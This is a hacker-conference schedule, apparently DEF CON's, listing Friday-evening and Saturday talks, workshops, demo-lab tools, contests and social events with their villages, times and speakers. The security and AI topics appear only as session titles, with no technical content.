MWV - cont...(14:00-17:59 PDT) - Binary exploitation basics - Leigh Trinity
MWV - The Beauty of Reversing Swift Malware - Chistopher Lopez
MWV - (17:50-18:20 PDT) - Domain Fronting in 2025: a retro analysis - Tom Cope
PGE - Friends of Bill W -
PGE - cont...(16:00-17:59 PDT) - Queercon Mixer -
QTV - cont...(16:00-17:59 PDT) - Quantum Table Top Threat Modelling - Jaya Baloo
SEV - cont...(08:30-17:59 PDT) - Social Engineering Community Village - Village Open -
SEV - Cold Calls -

 

Friday - 18:00 PDT


Return to Index  -  Locations Legend
MISC - cont...(08:00-18:59 PDT) - Human Registration Open -
MWV - cont...(17:50-18:20 PDT) - Domain Fronting in 2025: a retro analysis - Tom Cope
PGE - Lawyers Meet -
PGE - Spades Tournament & Game Night Social -
PGE - BIC Village Game Night -

 

Friday - 19:00 PDT


Return to Index  -  Locations Legend
CON - AI Art Battle -
MISC - Hacker Karaoke -
PGE - cont...(18:00-20:59 PDT) - Lawyers Meet -
PGE - BlanketFort Con -
PGE - cont...(18:00-20:59 PDT) - Spades Tournament & Game Night Social -
PGE - cont...(18:00-21:59 PDT) - BIC Village Game Night -

 

Friday - 20:00 PDT


Return to Index  -  Locations Legend
CON - cont...(19:00-20:59 PDT) - AI Art Battle -
CON - Hacker Jeopardy -
PGE - cont...(18:00-20:59 PDT) - Lawyers Meet -
PGE - DC404/DC678/DC770/DC470 (Atlanta Metro) Meetup -
PGE - cont...(18:00-20:59 PDT) - Spades Tournament & Game Night Social -
PGE - cont...(18:00-21:59 PDT) - BIC Village Game Night -

 

Friday - 21:00 PDT


Return to Index  -  Locations Legend
CON - cont...(20:00-21:59 PDT) - Hacker Jeopardy -
PGE - Women, gender non-conforming and non-binary meetup with The Diana Initiative -
PGE - cont...(20:00-22:59 PDT) - DC404/DC678/DC770/DC470 (Atlanta Metro) Meetup -
PGE - Arcade Party -
PGE - IoT Village 10th Birthday Party -
PGE - cont...(18:00-21:59 PDT) - BIC Village Game Night -

 

Friday - 22:00 PDT


Return to Index  -  Locations Legend
CON - (22:30-00:30 PDT) - Whose Slide Is It Anyway? -
PGE - cont...(21:00-23:30 PDT) - Women, gender non-conforming and non-binary meetup with The Diana Initiative -
PGE - +61: the Australian Embassy -
PGE - cont...(20:00-22:59 PDT) - DC404/DC678/DC770/DC470 (Atlanta Metro) Meetup -
PGE - cont...(21:00-23:59 PDT) - IoT Village 10th Birthday Party -

 

Friday - 23:00 PDT


Return to Index  -  Locations Legend
PGE - cont...(21:00-23:30 PDT) - Women, gender non-conforming and non-binary meetup with The Diana Initiative -
PGE - cont...(21:00-23:59 PDT) - IoT Village 10th Birthday Party -

Saturday


This Schedule is tentative and may be changed at any time. Check at an Info Booth for the latest.

 

Saturday - 06:00 PDT


Return to Index  -  Locations Legend
MISC - Defcon.run -

 

Saturday - 07:00 PDT


Return to Index  -  Locations Legend
MISC - cont...(06:00-07:59 PDT) - Defcon.run -

 

Saturday - 08:00 PDT


Return to Index  -  Locations Legend
RTV - (08:30-09:59 PDT) - Cyber Wargames: King of the Hill -
TRN - Influence Operations: Tactics, Defense, and Exploitation - Tom Cross,Greg Conti
TRN - Medical Device Penetration Testing -
TRN - Beginner's Guide to Attacks and Defenses - Sam Bowne,Kaitlyn Handelman,Irvin Lemus,Elizabeth Biddlecome

 

Saturday - 09:00 PDT


Return to Index  -  Locations Legend
DCW - Fortifying AI: Hands-On Training in Adversarial Attacks and Defense of AI Systems - Vishal "Vish" Thakur,John "Jlo" Lopes
DCW - Hands-On Threat Hunting with Wireshark - Chris Greer
DCW - Eliminating Bug Classes at Scale: Leveraging Browser Features for Proactive Defense - Javan Rasokat
DCW - Pen-testing Cloud REST APIs - Rodney Beede
DCW - Wi-Fi-So-Serious - James Hawk,Brian Burnett
DCW - Practical YARA: Crafting Custom Rules for Targeted Malware Defense - Joshua "jstrosch" Stroschein,Francisco Perdomo,Jae Young Kim
DCW - Reach the Nirvana - Yoann "OtterHacker" DEQUEKER
DCW - Advanced Ghidra Scripting & Automation - Max "Libra" Kersten
DL - Cryptosploit - Matt Cheung
DL - TheTimeMachine - Arjun "T3R4_KAAL" Chaudhary,Anmol "Fr13nd0x7f" K. Sachan
DL - AIMaL - Artificially Intelligent Malware Launcher - Endrit Shaqiri,Natyra Shaqiri
DL - AirBleed - Covert Bluetooth Plist Payload Injection - Ray "CURZE$" Cervantes,Yvonne "Von Marie" Cervantes
DL - Angry Magpie - DLP Bypass Simulator - Jeswin Mathai,Xian Xiang Chang
MISC - Human Registration Open -
RTV - Cyber Wargames: Strategic Operations -
RTV - cont...(08:30-09:59 PDT) - Cyber Wargames: King of the Hill -
TRN - cont...(08:00-16:59 PDT) - Influence Operations: Tactics, Defense, and Exploitation - Tom Cross,Greg Conti
TRN - cont...(08:00-16:59 PDT) - Medical Device Penetration Testing -
TRN - cont...(08:00-16:59 PDT) - Beginner's Guide to Attacks and Defenses - Sam Bowne,Kaitlyn Handelman,Irvin Lemus,Elizabeth Biddlecome

 

Saturday - 10:00 PDT


Return to Index  -  Locations Legend
- Sticker Swap -
- LHC Capture the Flag -
BBV - Nuclei: Beyond The Basic Templates - Ben "nahamsec" Sadeghipour
BBV - The Ars0n Framework V2 Beta - Harrison "rs0n" Richardson
CON - DEF CON Beard and Mustache Contest -
CON - Kubernetes Learning CTF (Non-competitive) w/ Support -
CON - (10:30-17:30 PDT) - Kubernetes Competitive CTF -
CON - Hac-Mac Contest Booth Open -
CON - The Pwnie Awards -
CPV - Crypto Privacy Village: Welcome - Crypto Privacy Village Staff
CPV - Gold Bug: Puzzle Panel with Friends -
CRE - Cryptocurrency Enforcement Actions - Veronika,Chelsea Button
CRE - Career Fair: Resume Review - Ruchira Pokhriyal,Harini Ramprasad
CRE - (10:15-10:59 PDT) - Private, Private, Private: Access Everywhere - Meghan Jacquot
CRE - Memorial Chamber Open -
DCT - AppleStorm - Unmasking the Privacy Risks of Apple Intelligence - Yoav Magid
DCT - Turning Camera Surveillance on its Axis - Noam Moshe
DCT - (10:30-11:15 PDT) - One Modem to Brick Them All: Exploiting Vulnerabilities in the EV Charging Communication - Marcell Szakály,Jan "SP3ZN45" Berens,Sebastian Köhler
DCT - Binary Facades: Reversing approaches to extract embedded scripts in compiled macOS malware - Patrick Wardle
DCT - (10:30-11:15 PDT) - Kill Chain Reloaded: Abusing legacy paths for stealth persistence - Alejandro "0xedh" Hernando,Borja "borjmz" Martinez
DCT - Where’s My Crypto, Dude? The Ultimate Guide to Crypto Money Laundering (and How to Track It) - Thomas "fr0gger_" Roccia
DCW - cont...(09:00-12:59 PDT) - Fortifying AI: Hands-On Training in Adversarial Attacks and Defense of AI Systems - Vishal "Vish" Thakur,John "Jlo" Lopes
DCW - cont...(09:00-12:59 PDT) - Hands-On Threat Hunting with Wireshark - Chris Greer
DCW - cont...(09:00-12:59 PDT) - Eliminating Bug Classes at Scale: Leveraging Browser Features for Proactive Defense - Javan Rasokat
DCW - cont...(09:00-12:59 PDT) - Pen-testing Cloud REST APIs - Rodney Beede
DCW - cont...(09:00-12:59 PDT) - Wi-Fi-So-Serious - James Hawk,Brian Burnett
DCW - cont...(09:00-12:59 PDT) - Practical YARA: Crafting Custom Rules for Targeted Malware Defense - Joshua "jstrosch" Stroschein,Francisco Perdomo,Jae Young Kim
DCW - cont...(09:00-12:59 PDT) - Reach the Nirvana - Yoann "OtterHacker" DEQUEKER
DCW - cont...(09:00-12:59 PDT) - Advanced Ghidra Scripting & Automation - Max "Libra" Kersten
DDV - DDV open and accepting drives for duplication -
DL - Attack Flow and Root Cause Discovery - No LLMs, No Queries, Just Explainable ML - Ezz Tahoun,Kevin Shi
DL - Beaconator C2 Framework - Mike "CroodSolutions" Manrod,Ezra "Shammahwoods" Woods
DL - Blackdagger - Cyber Workflow Automation Framework - Mahmut "ErdemOzgen" Erdem Ozgen,Ata Seren
DL - BOAZ - A Multilayered Approach to AV/EDR Evasion Engineering - Thomas "XM20" Xuan Meng
DL - WarHead - Vishal "Vish" Thakur,David "Votd_ctf" Wearing
ESV - How Not to IoT: Lessons in Security Failures - Zoltan "zh4ck" Balazs
ICSV - Critically Neglected: Cybersecurity for buildings - Thomas Pope
MHV - (10:30-10:59 PDT) - Navigating the Invisible - Mehmet Önder Key,Furkan Aydogan
MISC - cont...(09:00-18:59 PDT) - Human Registration Open -
MISC - Lost & Found -
MISC - Book Signing - Kyle Cucci/No Starch Press - Kyle "d4rksystem" Cucci
MISC - Book Signing - Cyber Calendar 2026 - Chris DeCarmen/Squared Away LLC - Chris DeCarmen
MISC - Book Signing - Patrick Wardle/ No Starch Press - Patrick Wardle
MISC - Book Signing - Adversary Emulation with MITRE ATT&CK - Drinor Selmanaj - Drinor Selmanaj
MWV - Malware and Monsters - Klaus Agnoletti
MWV - Making Dirty Pictures - The Issue with DICOM - Michael "v3ga" Aguilar
MWV - (10:40-11:10 PDT) - Your Static Tools Are Cute - My AI Ripped ZebLoader Apart - Anna Pham,Edward Crowder
PAYV - (10:15-10:30 PDT) - Intro to village - Leigh-Anne Galloway
PAYV - (10:30-10:59 PDT) - Card testing workshop - Vince Sloan
QTV - Quantum Pictorialism for Hackers - Bob Coecke
RTV - cont...(09:00-14:59 PDT) - Cyber Wargames: Strategic Operations -
RTV - Growing Red Team Village: What We’ve Learned Building an Offensive Security Community - Barrett Darnell,Mike Lisi,Omar Santos,Savannah Lazzara,Wes Thurner
SEV - Social Engineering Community Village - Village Open -
SEV - 10 Lessons from the Frontlines of AI Vishing: From Zero to (Almost) Hero - Matt Holland,Enrico Faccioli
SEV - (10:30-10:55 PDT) - Hacking the First Amendment: A press photographer's perspective on Red Teaming scenarios - Mansoor Ahmad,Brad Ammerman
TELV - Anotomy of Telecom Malware - Akib Sayyed
TRN - cont...(08:00-16:59 PDT) - Medical Device Penetration Testing -
TRN - cont...(08:00-16:59 PDT) - Influence Operations: Tactics, Defense, and Exploitation - Tom Cross,Greg Conti
TRN - cont...(08:00-16:59 PDT) - Beginner's Guide to Attacks and Defenses - Sam Bowne,Kaitlyn Handelman,Irvin Lemus,Elizabeth Biddlecome

 

Saturday - 11:00 PDT


Return to Index  -  Locations Legend
- cont...(10:00-12:59 PDT) - Sticker Swap -
- cont...(10:00-11:59 PDT) - LHC Capture the Flag -
ADV - Malware in the gist: How malicious packages on npm bypass existing security tools - Paul McCarty
BBV - Magical Hacks - Inti "intidc" De Ceukelaire
BHV - Operation Europa Crisis: A Tabletop Simulation - Nathan Case
BHV - accessDenied: Step Into the Scenario. Deal the Consequences. - Jack Voltaic
CON - cont...(10:00-11:59 PDT) - DEF CON Beard and Mustache Contest -
CON - cont...(10:00-16:59 PDT) - Kubernetes Learning CTF (Non-competitive) w/ Support -
CON - cont...(10:30-17:30 PDT) - Kubernetes Competitive CTF -
CON - cont...(10:00-17:59 PDT) - Hac-Mac Contest Booth Open -
CPV - Illuminating the Dark Corners of AI: Extracting Private Data from AI Models and Vector Embeddings - Patrick Walsh
CRE - cont...(10:00-11:50 PDT) - Cryptocurrency Enforcement Actions - Veronika,Chelsea Button
CRE - cont...(10:00-17:59 PDT) - Career Fair: Resume Review - Ruchira Pokhriyal,Harini Ramprasad
CRE - Cryptocurrency Weekend Keynote - Chelsea Button,Nick "c7five" Percoco,Elaine Shi
CRE - cont...(10:00-17:59 PDT) - Memorial Chamber Open -
DCT - How to secure unique ecosystem shipping 1 billion+ cores? - Adam "pi3" Zabrocki,Marko Mitic
DCT - The DOMino Effect: Automated Detection and Exploitation of DOM Clobbering Vulnerability at Scale - Zhengyu Liu,Jianjia Yu
DCT - cont...(10:30-11:15 PDT) - One Modem to Brick Them All: Exploiting Vulnerabilities in the EV Charging Communication - Marcell Szakály,Jan "SP3ZN45" Berens,Sebastian Köhler
DCT - (11:30-12:15 PDT) - Breakin 'Em All – Overcoming Pokemon Go's Anti-Cheat Mechanism - Tal Skverer
DCT - cont...(10:30-11:15 PDT) - Kill Chain Reloaded: Abusing legacy paths for stealth persistence - Alejandro "0xedh" Hernando,Borja "borjmz" Martinez
DCT - (11:30-12:15 PDT) - Original Sin of SSO: macOS PRT Cookie Theft & Entra ID Persistence via Device Forgery - Shang-De "HackerPeanutJohn" Jiang,Dong-Yi "Kazma Ye" Ye,Tung-Lin "Echo Lee" Lee
DCT - Man-in-the-Malware: Intercepting Adversarial Communications - Ben "polygonben" Folland
DCW - cont...(09:00-12:59 PDT) - Fortifying AI: Hands-On Training in Adversarial Attacks and Defense of AI Systems - Vishal "Vish" Thakur,John "Jlo" Lopes
DCW - cont...(09:00-12:59 PDT) - Hands-On Threat Hunting with Wireshark - Chris Greer
DCW - cont...(09:00-12:59 PDT) - Eliminating Bug Classes at Scale: Leveraging Browser Features for Proactive Defense - Javan Rasokat
DCW - cont...(09:00-12:59 PDT) - Pen-testing Cloud REST APIs - Rodney Beede
DCW - cont...(09:00-12:59 PDT) - Wi-Fi-So-Serious - James Hawk,Brian Burnett
DCW - cont...(09:00-12:59 PDT) - Practical YARA: Crafting Custom Rules for Targeted Malware Defense - Joshua "jstrosch" Stroschein,Francisco Perdomo,Jae Young Kim
DCW - cont...(09:00-12:59 PDT) - Reach the Nirvana - Yoann "OtterHacker" DEQUEKER
DCW - cont...(09:00-12:59 PDT) - Advanced Ghidra Scripting & Automation - Max "Libra" Kersten
DDV - cont...(10:00-16:59 PDT) - DDV open and accepting drives for duplication -
DL - Caldera for OT - Oops! All Software - Devon Colmer,Tony Webber
DL - Copycat - Identity Stealer Extension - Dakshitaa Babu,Shourya Pratap Singh
DL - DVBE - Damn Vulnerable Browser Extension - Abhinav Khanna
DL - Empire 6.0 - Vincent "Vinnybod" Rose,Jake "Hubble" Krasnov
DL - Unmanned Wireless Penetration Testing Device - Ayaan Qayyum,Omar Hamoudeh
HRV - Free Ham Radio Exams -
IOTV - No Brain No Gain - Mehmet Önder Key,Temel Demir,Dr. Ahmet Furkan Aydogan
MHV - (11:30-11:59 PDT) - State of the Pops: Mapping the Digital Waters - Vlatko Kosturjak,MJ Casado
MISC - cont...(09:00-18:59 PDT) - Human Registration Open -
MISC - Book Signing - Corey Ball/No Starch Press - Corey Ball
MISC - Book Signing - Casey Edman/No Starch Press - Casey Edman
MISC - Book Signing - Future of Hacking: The Rise of Cybercrime and the Fight to Keep Us Safe - Laura S. Scherling, EdD / Bloomsbury - Laura S. Scherling, EdD
MWV - cont...(10:00-12:59 PDT) - Malware and Monsters - Klaus Agnoletti
MWV - cont...(10:40-11:10 PDT) - Your Static Tools Are Cute - My AI Ripped ZebLoader Apart - Anna Pham,Edward Crowder
MWV - (11:20-11:50 PDT) - Smashing the Sandbox: Inside DBatLoader's Unique Evasion Techniques - Kyle "d4rksystem" Cucci
PAYV - Frida for reverse engineering payment applications - Ileana Barrionuevo
PAYV - GenAI red teaming for Payment Fraud - Karthik Tadinada,Martyn Higson
PAYV - The social engineering industry -
QTV - cont...(10:00-11:15 PDT) - Quantum Pictorialism for Hackers - Bob Coecke
RTV - cont...(09:00-14:59 PDT) - Cyber Wargames: Strategic Operations -
RTV - BloodHound Enterprise CTF - Hugo van den Toorn,Joey Dreijer
RTV - Hacker Troll House - James Rice
RTV - DNS-Based OSINT Tactics for Product and Service Discovery - Rishi "rxerium" Chudasama
RTV - Ransomware vs EDR: Inside the Attacker's Mind - Zoziel Freire
RTV - Creating an AI Agent to Hack a Web Application - Omar Santos
RTV - Malware Exploitation in PDFs: A Red Team Perspective - Filipi Pires
RTV - Old Tactics, New Weapons: Abusing Modern Software Stacks for Reliable Shell Access - Roberto Soares
RTV - Whispers Through the Firewall: Data Exfiltration and C2 with Port Knocking - Hubert Lin
SEV - cont...(10:00-17:59 PDT) - Social Engineering Community Village - Village Open -
SEV - The Devil Wears Headsets - Cronkitten
SEV - (11:30-11:55 PDT) - The Human Vulnerability: Social Engineering in a Hyper Connected World - fir3d0g
TRN - cont...(08:00-16:59 PDT) - Beginner's Guide to Attacks and Defenses - Sam Bowne,Kaitlyn Handelman,Irvin Lemus,Elizabeth Biddlecome
TRN - cont...(08:00-16:59 PDT) - Medical Device Penetration Testing -
TRN - cont...(08:00-16:59 PDT) - Influence Operations: Tactics, Defense, and Exploitation - Tom Cross,Greg Conti

 

Saturday - 12:00 PDT


Return to Index  -  Locations Legend
- cont...(10:00-12:59 PDT) - Sticker Swap -
BBV - Sometimes you find bugs, sometimes bugs find you - Jasmin "JR0ch17" Landry
BBV - From Component to Compromised: XSS via React createElement - Nick Copi
BHV - cont...(11:00-15:59 PDT) - accessDenied: Step Into the Scenario. Deal the Consequences. - Jack Voltaic
BHV - cont...(11:00-13:59 PDT) - Operation Europa Crisis: A Tabletop Simulation - Nathan Case
CON - cont...(10:00-16:59 PDT) - Kubernetes Learning CTF (Non-competitive) w/ Support -
CON - cont...(10:30-17:30 PDT) - Kubernetes Competitive CTF -
CON - cont...(10:00-17:59 PDT) - Hac-Mac Contest Booth Open -
CPV - Cracking Chaos: Making, Using, and Breaking PRNGs - 1nfocalypse
CRE - Hacking Custody and Exchanges - Sky Gul,Andrea
CRE - Rayhunter Internals - oopsbagel,Cooper "CyberTiger" Quintin
CRE - cont...(10:00-17:59 PDT) - Career Fair: Resume Review - Ruchira Pokhriyal,Harini Ramprasad
CRE - DDoS: The Next Generation - Andrew Cockburn
CRE - cont...(10:00-17:59 PDT) - Memorial Chamber Open -
DCT - Client or Server? The Hidden Sword of Damocles in Kafka - Ji'an "azraelxuemo" Zhou,Ying Zhu,ZiYang "lz2y" Li
DCT - Help! Linux in my Webcam! (•_•) - Mickey Shkatov,Jesse Michael
DCT - cont...(11:30-12:15 PDT) - Breakin 'Em All – Overcoming Pokemon Go's Anti-Cheat Mechanism - Tal Skverer
DCT - (12:30-13:15 PDT) - Claude--Climbing a CTF Scoreboard Near You - Keane Lucas
DCT - cont...(11:30-12:15 PDT) - Original Sin of SSO: macOS PRT Cookie Theft & Entra ID Persistence via Device Forgery - Shang-De "HackerPeanutJohn" Jiang,Dong-Yi "Kazma Ye" Ye,Tung-Lin "Echo Lee" Lee
DCT - (12:30-13:15 PDT) - Diamonds Are For Hackers - Building the first fully open source and hackable Quantum Sensor - Mark "LargeCardinal" Carney,Victoria "V__Wave" Kumaran
DCT - Not Just a Pipeline Leak: Reconstructing the Real Attack Behind tj-actions - Aviad Hahami
DCW - cont...(09:00-12:59 PDT) - Fortifying AI: Hands-On Training in Adversarial Attacks and Defense of AI Systems - Vishal "Vish" Thakur,John "Jlo" Lopes
DCW - cont...(09:00-12:59 PDT) - Hands-On Threat Hunting with Wireshark - Chris Greer
DCW - cont...(09:00-12:59 PDT) - Eliminating Bug Classes at Scale: Leveraging Browser Features for Proactive Defense - Javan Rasokat
DCW - cont...(09:00-12:59 PDT) - Pen-testing Cloud REST APIs - Rodney Beede
DCW - cont...(09:00-12:59 PDT) - Wi-Fi-So-Serious - James Hawk,Brian Burnett
DCW - cont...(09:00-12:59 PDT) - Practical YARA: Crafting Custom Rules for Targeted Malware Defense - Joshua "jstrosch" Stroschein,Francisco Perdomo,Jae Young Kim
DCW - cont...(09:00-12:59 PDT) - Reach the Nirvana - Yoann "OtterHacker" DEQUEKER
DCW - cont...(09:00-12:59 PDT) - Advanced Ghidra Scripting & Automation - Max "Libra" Kersten
DDV - cont...(10:00-16:59 PDT) - DDV open and accepting drives for duplication -
DL - EntraGoat - A Deliberately Vulnerable Entra ID Environment - Tomer Nahum,Jonathan Elkabas
DL - FLARE-VM - Joshua "jstrosch" Stroschein,Elliot Chernofsky
DL - GlytchC2 - Command Execution and Data Exfiltration of Any Kind Through Live Streaming Platforms - Anil Celik,Emre Odaman
DL - Have I Been Ransomed? - Juanma "M4C" Tejada
DL - Lex Sleuther - Aaron "KNOX" James
HRV - cont...(11:00-16:59 PDT) - Free Ham Radio Exams -
IOTV - What’s Really in the Box? The Case for Hardware Provenance and HBOMs - Allan Friedman
MISC - cont...(09:00-18:59 PDT) - Human Registration Open -
MISC - Book Signing - Micah Lee/ No Starch Press - Micah "micahflee" Lee
MISC - Book Signing - Practical Lock Picking; Keys to the Kingdom - Deviant Ollam/Red Team Tools - Deviant Ollam
MWV - cont...(10:00-12:59 PDT) - Malware and Monsters - Klaus Agnoletti
MWV - I Can't RE (and You Can Too!) - Johnny Xmas
PGE - Friends of Bill W -
PSV - From Pwn to Plan: Turning Physical Exploits Into Upgrades - Shawn
PSV - How NOT to Perform Covert Entry Assessments by WeHackPeople.com - Brent White,Tim Roberts
RTV - cont...(09:00-14:59 PDT) - Cyber Wargames: Strategic Operations -
RTV - cont...(11:00-16:50 PDT) - BloodHound Enterprise CTF - Hugo van den Toorn,Joey Dreijer
RTV - cont...(11:00-14:50 PDT) - Hacker Troll House - James Rice
RTV - cont...(11:00-16:50 PDT) - DNS-Based OSINT Tactics for Product and Service Discovery - Rishi "rxerium" Chudasama
RTV - cont...(11:00-16:50 PDT) - Ransomware vs EDR: Inside the Attacker's Mind - Zoziel Freire
RTV - Getting Caught in Offensive Security - Graham Helton,Kevin Clark,Red Team Village Staff,Skyler Knecht
SEV - cont...(10:00-17:59 PDT) - Social Engineering Community Village - Village Open -
SEV - Do Scammers dream of electric Phish? Lessons learned from deploying AI-driven phishing ops - Daniel Marques
SEV - (12:30-15:30 PDT) - Battle of the Bots: Vishing Edition -
TRN - cont...(08:00-16:59 PDT) - Medical Device Penetration Testing -
TRN - cont...(08:00-16:59 PDT) - Beginner's Guide to Attacks and Defenses - Sam Bowne,Kaitlyn Handelman,Irvin Lemus,Elizabeth Biddlecome
TRN - cont...(08:00-16:59 PDT) - Influence Operations: Tactics, Defense, and Exploitation - Tom Cross,Greg Conti

 

Saturday - 13:00 PDT


Return to Index  -  Locations Legend
BBV - Breaking the Chain: Advanced Offensive Strategies in the Software Supply Chain - Roni "lupin" Carta,Adnan Khan
BBV - Surfing through the Stream: Advanced HTTP Desync exploitation in the wild - Martin "tincho_508" Doyhenard
BHV - cont...(11:00-15:59 PDT) - accessDenied: Step Into the Scenario. Deal the Consequences. - Jack Voltaic
BHV - cont...(11:00-13:59 PDT) - Operation Europa Crisis: A Tabletop Simulation - Nathan Case
CHV - Uncovering the Secrets of Tire Pressure Monitoring Systems - Yago Lizarribar
CON - Taskmooster -
CON - cont...(10:00-16:59 PDT) - Kubernetes Learning CTF (Non-competitive) w/ Support -
CON - cont...(10:30-17:30 PDT) - Kubernetes Competitive CTF -
CON - cont...(10:00-17:59 PDT) - Hac-Mac Contest Booth Open -
CRE - cont...(12:00-13:50 PDT) - Hacking Custody and Exchanges - Sky Gul,Andrea
CRE - cont...(10:00-17:59 PDT) - Career Fair: Resume Review - Ruchira Pokhriyal,Harini Ramprasad
CRE - cont...(10:00-17:59 PDT) - Memorial Chamber Open -
DCG - DEF CON Groups (DCGs): Keeping the Signal Alive All Year Long - Adam915,Jayson E Street,Alethe Denis
DCT - Hackers Dropping Mid-Heist Selfies: LLM Identifies Information Stealer Infection Vector and Extracts IoCs - Olivier Bilodeau,Estelle Ruellan
DCT - Thinking Like a Hacker in the Age of AI - Richard "neuralcowboy" Thieme
DCT - cont...(12:30-13:15 PDT) - Claude--Climbing a CTF Scoreboard Near You - Keane Lucas
DCT - (13:30-14:15 PDT) - One Key, Two Key, I Just Stole Your goTenna Key - Erwin "Dollarhyde" Karincic,Woody
DCT - cont...(12:30-13:15 PDT) - Diamonds Are For Hackers - Building the first fully open source and hackable Quantum Sensor - Mark "LargeCardinal" Carney,Victoria "V__Wave" Kumaran
DCT - (13:30-14:15 PDT) - CTRAPS: CTAP Impersonation and API Confusion Attacks on FIDO2 - Marco Casagrande,Daniele Antonioli
DCT - Stories from a Tor dev - Roger "arma" Dingledine
DDV - cont...(10:00-16:59 PDT) - DDV open and accepting drives for duplication -
DDV - Tracking 300k+ drives: What we’ve learned after 13 years - Pat Patterson,Stephanie Doyle
DL - Messenger - Proxies Here There and Everywhere - Skyler Knecht,Kevin Clark
DL - Robin - The Archaeologist of the Dark Web - Apurv "ASG_Sc0rpi0n" Singh Gautam
DL - MPIT - Matrix Prompt Injection Tool and ShinoLLMApps - Shota "Sh1n0g1" Shinogi,Sasuke "Element138" Kondo
DL - Nebula - 4 Years and Still Kicking *aaS - Bleon "Gl4ssesbo1" Proko
DL - nRootTag - Exploiting Find My and Transforming Computers Into Unauthorized Trackers - Junming "Chapoly1305" Chen,Qiang Zeng
GHV - What Game Hackers teach us about Offensive Security and Red Teaming - Joe "Juno" Aurelio
HRV - cont...(11:00-16:59 PDT) - Free Ham Radio Exams -
ICSV - Deploying Deception in Depth for ICS - Brent Muir
IOTV - (13:45-14:15 PDT) - The Things know What You Did Last Session - Will Baggett
MISC - cont...(09:00-18:59 PDT) - Human Registration Open -
MISC - Book Signing - Eugene Lim/ No Starch Press - Eugene "spaceraccoon" Lim
MWV - (13:40-14:15 PDT) - Enshittification: It's Over 9000 - Lena "LambdaMamba" Yu,Andrew Brandt,Samuel Gasparro,Daniel Ward
PHV - Deepfake Image and Video Detection   - Mike Raggo
RTV - cont...(09:00-14:59 PDT) - Cyber Wargames: Strategic Operations -
RTV - cont...(11:00-16:50 PDT) - BloodHound Enterprise CTF - Hugo van den Toorn,Joey Dreijer
RTV - cont...(11:00-14:50 PDT) - Hacker Troll House - James Rice
RTV - cont...(11:00-16:50 PDT) - DNS-Based OSINT Tactics for Product and Service Discovery - Rishi "rxerium" Chudasama
RTV - cont...(11:00-16:50 PDT) - Ransomware vs EDR: Inside the Attacker's Mind - Zoziel Freire
RTV - Introduction to Operationalizing & Using C2 (w/ some AI) - Gabi Joseph,Josh Millsap
RTV - StealthToken: Exploiting Identity Providers the Serverless Way - Manish Gupta,Yash Bharadwaj
RTV - Building Your First Windows Malware Loader - Royce Yaezenko
SEV - cont...(10:00-17:59 PDT) - Social Engineering Community Village - Village Open -
SEV - cont...(12:30-15:30 PDT) - Battle of the Bots: Vishing Edition -
TRN - cont...(08:00-16:59 PDT) - Beginner's Guide to Attacks and Defenses - Sam Bowne,Kaitlyn Handelman,Irvin Lemus,Elizabeth Biddlecome
TRN - cont...(08:00-16:59 PDT) - Influence Operations: Tactics, Defense, and Exploitation - Tom Cross,Greg Conti
TRN - cont...(08:00-16:59 PDT) - Medical Device Penetration Testing -

 

Saturday - 14:00 PDT


Return to Index  -  Locations Legend
ADV - Blurred Lines of Cyber Threat Attribution: The Evolving Tactics of North Korean Cyber Threat Actors - Seongsu Park
AIV - (14:15-14:59 PDT) - Assessing the Capabilities Gap Between Foundation Models and Cybersecurity Experts: Benchmarks, Safeguards, and Policy - Justin W. Lin
ASV - Red Teaming Space: Hacking the Final Frontier - Tim Fowler
BBV - cont...(13:00-14:30 PDT) - Surfing through the Stream: Advanced HTTP Desync exploitation in the wild - Martin "tincho_508" Doyhenard
BHV - cont...(11:00-15:59 PDT) - accessDenied: Step Into the Scenario. Deal the Consequences. - Jack Voltaic
CON - cont...(13:00-14:59 PDT) - Taskmooster -
CON - cont...(10:00-16:59 PDT) - Kubernetes Learning CTF (Non-competitive) w/ Support -
CON - cont...(10:30-17:30 PDT) - Kubernetes Competitive CTF -
CON - cont...(10:00-17:59 PDT) - Hac-Mac Contest Booth Open -
CRE - Oblivious Access to Blockchains - Elaine Shi,Afonso Tinoco
CRE - cont...(10:00-17:59 PDT) - Career Fair: Resume Review - Ruchira Pokhriyal,Harini Ramprasad
CRE - Tech Reclaimers -
CRE - Surviving the Dataclysm: Resistance through Resilience - Rebecah Miller
CRE - (14:30-14:59 PDT) - #ReclaimTech - A community movement - Janet Vertesi,Andy Hull
CRE - cont...(10:00-17:59 PDT) - Memorial Chamber Open -
DCT - RATs & Socks abusing Google Services - Valerio "MrSaighnal" Alessandroni
DCT - (14:30-14:50 PDT) - HaKCing OBD-II Emissions Testing - Archwisp
DCT - Rebadged, Relabeled, and Rooted: Pwnage via the Solar Supply Chain - Anthony "Coin" Rose,Jake "Hubble" Krasnov
DCT - cont...(13:30-14:15 PDT) - One Key, Two Key, I Just Stole Your goTenna Key - Erwin "Dollarhyde" Karincic,Woody
DCT - (14:30-15:15 PDT) - ReVault! Compromised by your Secure SoC - Philippe "phLaul" Laulheret
DCT - cont...(13:30-14:15 PDT) - CTRAPS: CTAP Impersonation and API Confusion Attacks on FIDO2 - Marco Casagrande,Daniele Antonioli
DCT - (14:30-16:15 PDT) - Ask EFF - Hannah Zhao,Alexis Hancock,Cooper "CyberTiger" Quintin,Lisa Femia,Thorin Klosowski
DCT - TSPU: Russia's Firewall and Defending Against the Future of Digital Repression - Benjamin "bmixonbaca" Mixon-Baca
DCW - Learning to Hack Bluetooth Low Energy with BLE CTF - Ryan Holeman,Alek Amrani
DCW - Putting EDRs in Their Place: Killing and Silencing EDR Agents - Ryan "rj_chap" Chapman,Aaron "ironcat" Rosenmund
DCW - From Prompt to Protection: A Practical Guide to Building and Securing Generative AI Applications - Ashwin Iyer,Ritika Verma
DCW - K8sploitation: Hacking Kubernetes the Fun Way - Marcelo Ribeiro,Jeff Jordan
DCW - Hacking The Metal: Into the GPU - eigentourist
DCW - Hacker VPN - Eijah,Benjamin "Cave Twink" Woodill
DCW - Defeating Malware Evasion: Techniques and Countermeasures - Kyle "d4rksystem" Cucci,Randy Pargman
DCW - Deep-dive into modern network fingerprinting - Vlad Iliushin
DDV - cont...(10:00-16:59 PDT) - DDV open and accepting drives for duplication -
DL - OAuthSeeker - Adam "UNC1739" Crosser
DL - PAPRa - Sean Marquez,Melanie "Goldfishlaser" Allen
DL - PatchLeaks - Huseyn "Khatai" Gadashov
DL - promptmap2 - Utku Sen
DL - RETINA - Realtime Electronic Threat and Intrusion Neutralization Apparatus - Cesare "Red5heep" Pizzi
HHV - The Missing Link: Draytek’s New RCEs Complete the Chain - Octavio Gianatiempo,Gaston Aznarez
